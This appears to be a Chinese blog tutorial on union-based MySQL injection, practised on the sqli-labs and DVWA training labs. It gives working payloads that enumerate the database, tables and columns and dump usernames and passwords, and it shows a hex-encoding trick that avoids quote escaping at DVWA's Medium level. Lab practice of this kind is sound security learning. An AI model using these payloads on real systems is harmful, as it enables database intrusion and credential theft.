首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
MySQL复制问题的三个参数分析
Apr 07 MySQL
MySQL查询学习之基础查询操作
May 08 MySQL
MySQL时间盲注的五种延时方法实现
May 18 MySQL
mysql如何配置白名单访问
Jun 30 MySQL
MySQL数据库必备之条件查询语句
Oct 15 MySQL
mysql的数据压缩性能对比详情
Nov 07 MySQL
MySQL数据库⾼可⽤HA实现小结
Jan 22 MySQL
mysql自增长id用完了该怎么办
Feb 12 MySQL
排查并解决MySQL生产库内存使用率高的报警
Apr 11 MySQL
深入理解mysql事务隔离级别和存储引擎
Apr 12 MySQL
详解Mysq MVCC多版本的并发控制
Apr 29 MySQL
手把手带你彻底卸载MySQL数据库
Jun 14 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
责任书(145) 承诺书(369) 主持词(345) 聘任书(31) 决心书(42) 广告词(105) 竞聘书(31) 建议书(203) 担保书(46) 意向书(73)
You might like
综合图片计数器
2006/10/09 PHP
codeigniter集成ucenter1.6双向通信的解决办法
2014/06/12 PHP
解决ThinkPHP下使用上传插件Uploadify浏览器firefox报302错误的方法
2015/12/18 PHP
jquery 模拟类搜索框自动完成搜索提示功能(改进)
2010/05/24 Javascript
一个关于jqGrid使用的小例子(行按钮)
2011/11/04 Javascript
form.submit()不能提交表单的原因分析
2014/10/23 Javascript
jQuery实现多按钮单击变色
2014/11/27 Javascript
详解JavaScript基本类型和引用类型
2015/12/09 Javascript
微信小程序 安全包括(框架、功能模块、账户使用)详解
2017/01/16 Javascript
layer子层给父层页面元素赋值,以达到向父层页面传值的效果实例
2017/09/22 Javascript
浅谈vuejs实现数据驱动视图原理
2018/02/23 Javascript
Vue 源码分析之 Observer实现过程
2018/03/29 Javascript
Javascript中弹窗confirm与prompt的区别
2018/10/26 Javascript
Nodejs实现的操作MongoDB数据库功能完整示例
2019/02/02 NodeJs
vue基本使用--refs获取组件或元素的实例
2019/11/07 Javascript
如何通过vscode运行调试javascript代码
2020/07/24 Javascript
python+Django+apache的配置方法详解
2016/06/01 Python
python中csv文件的若干读写方法小结
2018/07/04 Python
NumPy.npy与pandas DataFrame的实例讲解
2018/07/09 Python
django项目搭建与Session使用详解
2018/10/10 Python
python批量获取html内body内容的实例
2019/01/02 Python
matplotlib交互式数据光标mpldatacursor的实现
2021/02/03 Python
css3 条纹化和透明化表格Firefox下测试成功
2014/04/15 HTML / CSS
IE支持HTML5的解决方法
2009/10/20 HTML / CSS
html标签之Object和EMBED标签详解
2013/07/04 HTML / CSS
美国婚戒购物网站:Anjays Designs
2017/06/28 全球购物
全球最大的游戏市场:G2A
2018/07/05 全球购物
小学生家长评语大全
2014/02/10 职场文书
优秀医生事迹材料
2014/02/12 职场文书
优秀本科生求职推荐信
2014/02/24 职场文书
出生证明公证书
2014/04/09 职场文书
改革共识倡议书
2014/08/29 职场文书
学习十八大宣传标语
2014/10/09 职场文书
法律意见书范文
2015/05/20 职场文书
导游词之江南园林狮子林
2019/09/16 职场文书
python中的class_static的@classmethod的巧妙用法
2021/06/22 Python